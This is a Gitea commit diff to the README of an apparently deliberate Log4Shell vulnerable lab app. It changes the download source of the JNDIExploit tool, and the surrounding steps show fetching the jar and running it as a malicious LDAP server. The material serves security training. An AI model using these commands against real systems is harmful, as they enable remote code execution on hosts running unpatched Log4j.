Actualizar 'README.md'
This commit is contained in:
parent
42b1785385
commit
2ceb2921ea
|
@ -24,7 +24,7 @@ docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shel
|
||||||
* Use [JNDIExploit](https://github.com/zzwlpx/JNDIExploit) to spin up a malicious LDAP server
|
* Use [JNDIExploit](https://github.com/zzwlpx/JNDIExploit) to spin up a malicious LDAP server
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
|
wget https://gitea.avc.cx/borekon/log4shell-vulnerable-app/raw/branch/main/JNDIExploit.v1.2.zip
|
||||||
unzip JNDIExploit.v1.2.zip
|
unzip JNDIExploit.v1.2.zip
|
||||||
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888
|
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888
|
||||||
```
|
```
|
||||||
|
|
Loading…
Reference in New Issue
Block a user